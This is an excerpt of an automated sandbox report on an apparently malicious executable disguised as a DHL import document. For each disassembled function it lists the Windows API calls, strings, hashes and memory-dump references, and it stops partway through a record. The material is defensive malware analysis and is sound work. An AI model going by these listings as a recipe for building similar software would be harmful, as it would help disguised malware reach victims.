Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 722f9da759509b1f8ce196fc8577cfd64c2bf00042b299689f788069273c5705
Instruction ID: 3c83de9fff54ac2c56f94d73495d1c02e88987c295ca43cef83d8b6f876d3d1f
Opcode Fuzzy Hash: 722f9da759509b1f8ce196fc8577cfd64c2bf00042b299689f788069273c5705
Instruction Fuzzy Hash: 58214875900104AEDB146B65DC85CFF7FBDFF41398B10441EF815A71E0DB380D599624

Function 0056C9EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0056C9F1
_wcslen.LIBCMT ref: 0056CA68
_wcslen.LIBCMT ref: 0056CA9E
_wcslen.LIBCMT ref: 0056CAF9
_wcslen.LIBCMT ref: 0056CB2F
_wcslen.LIBCMT ref: 0056CB7F

Strings

HKEY_LOCAL_MACHINE, xrefs: 0056CA62, 0056CA67
HKLM, xrefs: 0056CA98, 0056CA9D

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _wcslen
String ID: HKEY_LOCAL_MACHINE$HKLM
API String ID: 176396367-4004644295
Opcode ID: 23c228477a115fd48d228fbfd17d64e984efab790298d3e1a5de85887a1708e0
Instruction ID: 2732aad7c23ddb391bef74a113b58523e875e7da6e95c75dfb28a39328e7a3f7
Opcode Fuzzy Hash: 23c228477a115fd48d228fbfd17d64e984efab790298d3e1a5de85887a1708e0
Instruction Fuzzy Hash: 8431097360056A4BCB20DFADC8401BE3F917BA1794B494129EC91AB345E670CD80D3A0

Function 00572F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00572F8D
LoadLibraryW.KERNEL32(?), ref: 00572F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00572FA9
DestroyWindow.USER32(?), ref: 00572FB1

Strings

SysAnimate32, xrefs: 00572F68

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: b1815e763f0022fa4ef56cf83b8011941de50d2ac0fbe9dd76604a69dcf35400
Instruction ID: 3954153a39c9ef6d2c5eefa7609caff0d4b22f2b32e6a1f94f5143796e822d7a
Opcode Fuzzy Hash: b1815e763f0022fa4ef56cf83b8011941de50d2ac0fbe9dd76604a69dcf35400
Instruction Fuzzy Hash: 3721C072200205ABEF104F68EC86EBB3BBDFB59364F108619F958D6190D771DC91B760

Function 00504D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00504D1E,005128E9,?,00504CBE,005128E9,005A88B8,0000000C,00504E15,005128E9,00000002), ref: 00504D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00504DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00504D1E,005128E9,?,00504CBE,005128E9,005A88B8,0000000C,00504E15,005128E9,00000002,00000000), ref: 00504DC3

Strings

CorExitProcess, xrefs: 00504D98
mscoree.dll, xrefs: 00504D86

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 253440d173eb941f66dba2c68d9919fb5e874741366e597b1074721de8a5184a
Instruction ID: 1cd86cc1d516e157541901226a0f80a2eaa700f3949116c88a9d4465c8c2c51a
Opcode Fuzzy Hash: 253440d173eb941f66dba2c68d9919fb5e874741366e597b1074721de8a5184a
Instruction Fuzzy Hash: A6F04F75A40208BBDB119F90EC49BADBFB5FF54751F4400A8F909A62A0CB305984EF91

Function 004E4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,004E4EDD,?,005B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 004E4E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 004E4EAE
FreeLibrary.KERNEL32(00000000,?,?,004E4EDD,?,005B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 004E4EC0

Strings

Wow64DisableWow64FsRedirection, xrefs: 004E4EA8
kernel32.dll, xrefs: 004E4E94

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 427725f6f5a10f0d4490a154e0a97b6aeb507f02b9a9c1f40f1e1cd5b6f640e9
Instruction ID: ea7c326553dd44e790d4549ca57451780bc8c705a354f89fe6cfd3f2d839cdf9
Opcode Fuzzy Hash: 427725f6f5a10f0d4490a154e0a97b6aeb507f02b9a9c1f40f1e1cd5b6f640e9
Instruction Fuzzy Hash: ACE08635A016625BD2311B2A7C1CA5F6F54AFD2B63B45012AFC08D2300DB64CD45E5A4

Function 004E4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00523CDE,?,005B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 004E4E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 004E4E74
FreeLibrary.KERNEL32(00000000,?,?,00523CDE,?,005B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 004E4E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 004E4E6E
kernel32.dll, xrefs: 004E4E5B

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 8a665c3515e4f8c240d81cf187d582c0536bd687aa53069b69343db9f317d463
Instruction ID: 5e74f0800f1f7e4de9d97bbd0b06202790fefd13221c10465c6da6d8c3d8546b
Opcode Fuzzy Hash: 8a665c3515e4f8c240d81cf187d582c0536bd687aa53069b69343db9f317d463
Instruction Fuzzy Hash: 21D0C2319027615786221B2A7C0CD8F6F18BFCAB22349012AB808A6210CF24CD41E5D4

Function 00552947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00552C05
DeleteFileW.KERNEL32(?), ref: 00552C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00552C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00552CAE
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00552CC0

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 5ba365d847641446bd4b460a03587a4ad2aa07f2893926d46ed996ff064375d5
Instruction ID: d7dc7fb2c23d1cc465366703297f3c092495a1efe5084b8afc0be63fd966dcae
Opcode Fuzzy Hash: 5ba365d847641446bd4b460a03587a4ad2aa07f2893926d46ed996ff064375d5
Instruction Fuzzy Hash: 79B16F71900119ABDF21DBA5CC99EDEBB7DFF49315F1040AAF909E6141EA309A488F61

Function 0056A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0056A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0056A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0056A468
CloseHandle.KERNEL32(?), ref: 0056A63D

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 00c697d18b13b7a9d7148b04ebca49dd6d2dbaf8961c98694fc27ea16e0f72f0
Instruction ID: 15d70eeb871cfb054598c4f0cf0a8da54df79a94f43c4ae4104a26b0ee654028
Opcode Fuzzy Hash: 00c697d18b13b7a9d7148b04ebca49dd6d2dbaf8961c98694fc27ea16e0f72f0
Instruction Fuzzy Hash: 22A1A171604300AFD720DF25D886F2ABBE5AF84718F14881DF59A9B2D2DB74EC418B96

Function 0054E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0054DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0054CF22,?), ref: 0054DDFD

Part of subcall function 0054DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0054CF22,?), ref: 0054DE16

Part of subcall function 0054E199: GetFileAttributesW.KERNEL32(?,0054CF95), ref: 0054E19A

lstrcmpiW.KERNEL32(?,?), ref: 0054E473
MoveFileW.KERNEL32(?,?), ref: 0054E4AC
_wcslen.LIBCMT ref: 0054E5EB
_wcslen.LIBCMT ref: 0054E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0054E650

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: fe6d28ea410a9a7efe5ed0c129e461a5a859e9c5ea1726ce8d703d55aa63840e
Instruction ID: efb2e489f965cdd8ec1fcfee71a8a5a0e18526bf158fb022f42de65ec3f16040
Opcode Fuzzy Hash: fe6d28ea410a9a7efe5ed0c129e461a5a859e9c5ea1726ce8d703d55aa63840e
Instruction Fuzzy Hash: 905151B24083859BC724EB90D8859DF7BECBF84344F00491EF689D3191EF75A5888B66

Function 0056B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004E9CB3: _wcslen.LIBCMT ref: 004E9CBD

Part of subcall function 0056C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0056B6AE,?,?), ref: 0056C9B5
Part of subcall function 0056C998: _wcslen.LIBCMT ref: 0056C9F1
Part of subcall function 0056C998: _wcslen.LIBCMT ref: 0056CA68
Part of subcall function 0056C998: _wcslen.LIBCMT ref: 0056CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0056BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0056BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0056BB63
RegCloseKey.ADVAPI32(?,?), ref: 0056BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0056BBB3

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: cb02004cd310286c3cd1d39b79298429b44d04b8e7510b43a502da719bf64a62
Instruction ID: 38b3d0c8e542fac5ff881bbb6f00e463ee89a06d4481343af2726c5eae591ebc
Opcode Fuzzy Hash: cb02004cd310286c3cd1d39b79298429b44d04b8e7510b43a502da719bf64a62
Instruction Fuzzy Hash: 9B61B131208241AFD314DF55C494E2ABBE5FF84348F54895DF4998B2A2DB31ED85CB92

Function 00548BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00548BCD
VariantClear.OLEAUT32 ref: 00548C3E
VariantClear.OLEAUT32 ref: 00548C9D
VariantClear.OLEAUT32(?), ref: 00548D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00548D3B

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: a50698874cabbf2ca515de572576f337dafa37f69f0fd65885426e8903b78786
Instruction ID: becec24ca23374d8e0fe458ebc328db8515e094969a06553e839598ceecfcd94
Opcode Fuzzy Hash: a50698874cabbf2ca515de572576f337dafa37f69f0fd65885426e8903b78786
Instruction Fuzzy Hash: 325168B5A01219EFCB10CF68D884AAABBF9FF89314B158559E909DB350E730E911CF90

Function 00558AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00558BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00558BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00558C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00558C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00558C5F

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: c677bbb1b6a83a2679f5800fee526a6dd634f3ad75cd4f3d20ec450518880783
Instruction ID: 186e197ec4b1e8e1e432b0fdcdc7b0733bbd9d0a4a5284b8c0325499011999d4
Opcode Fuzzy Hash: c677bbb1b6a83a2679f5800fee526a6dd634f3ad75cd4f3d20ec450518880783
Instruction Fuzzy Hash: 19516D35A00614AFCB00DF66C880A6DBBF5FF48319F08845DE849AB362DB35ED45DB94

Function 00568EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00568F40
GetProcAddress.KERNEL32(00000000,?), ref: 00568FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00568FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00569032
FreeLibrary.KERNEL32(00000000), ref: 00569052

Part of subcall function 004FF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00551043,?,753CE610), ref: 004FF6E6
Part of subcall function 004FF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0053FA64,00000000,00000000,?,?,00551043,?,753CE610,?,0053FA64), ref: 004FF70D

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: e1373b53a6c93c381638b886a0353823b1b6b0276237ad552c63d6b94f4be532
Instruction ID: ebd2e1961997a786dd27d8db9fcfeeb45317f53ba806546c2ee3e9c825b43dff
Opcode Fuzzy Hash: e1373b53a6c93c381638b886a0353823b1b6b0276237ad552c63d6b94f4be532
Instruction Fuzzy Hash: 19514D35600245DFCB11DF69C4948ADBFF1FF49328B0481A9E90A9B362DB35ED85CB90

Function 00576B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00576C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00576C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00576C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0055AB79,00000000,00000000), ref: 00576C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00576CC7

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 5dea8b4c3f3894c6f4481265525acbb97254d6bfb99821fb17250ec0c80a5ae3
Instruction ID: 8fa71ddf220941e23a96cd928c63b5e96aa9b977a6e5e1a053830293e2849e6b
Opcode Fuzzy Hash: 5dea8b4c3f3894c6f4481265525acbb97254d6bfb99821fb17250ec0c80a5ae3
Instruction Fuzzy Hash: 0441B235604504AFD725CF28EC58FA97FA9FB09350F148268F89DAB2E0C371AD41FA40

Function 00512051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 005120C3
_free.LIBCMT ref: 005120E3

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e5524a5ebca7fe8ceb728217bfe96d8b75afc6d93dc50455e60af706b12293ec
Instruction ID: 91d81a4b4b771334a4bb403659a6ed36f88576e072f8d5faf1f12bd18f689a80
Opcode Fuzzy Hash: e5524a5ebca7fe8ceb728217bfe96d8b75afc6d93dc50455e60af706b12293ec
Instruction Fuzzy Hash: EE41E432A00204AFDB24DF78C885A9DBBF5FF89314F154569E615EB391DB31AD51CB80

Function 004F912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 004F9141
ScreenToClient.USER32(00000000,?), ref: 004F915E
GetAsyncKeyState.USER32(00000001), ref: 004F9183
GetAsyncKeyState.USER32(00000002), ref: 004F919D

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 8220fc61892598c90bc05f5dba2dc5bb0f172fb0036929a944805fbdb0ed1f0a
Instruction ID: 39e7b6651491d7a631e0c0e800c6269af6ef564d4cb1c017f0d6b85d46ec5b1d
Opcode Fuzzy Hash: 8220fc61892598c90bc05f5dba2dc5bb0f172fb0036929a944805fbdb0ed1f0a
Instruction Fuzzy Hash: 9A41607190850BFBDF159F64D848BFEBB74FB09324F20822AE529A3290C7346D54DB95

Function 00553874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 005538CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00553922
TranslateMessage.USER32(?), ref: 0055394B
DispatchMessageW.USER32(?), ref: 00553955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00553966

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
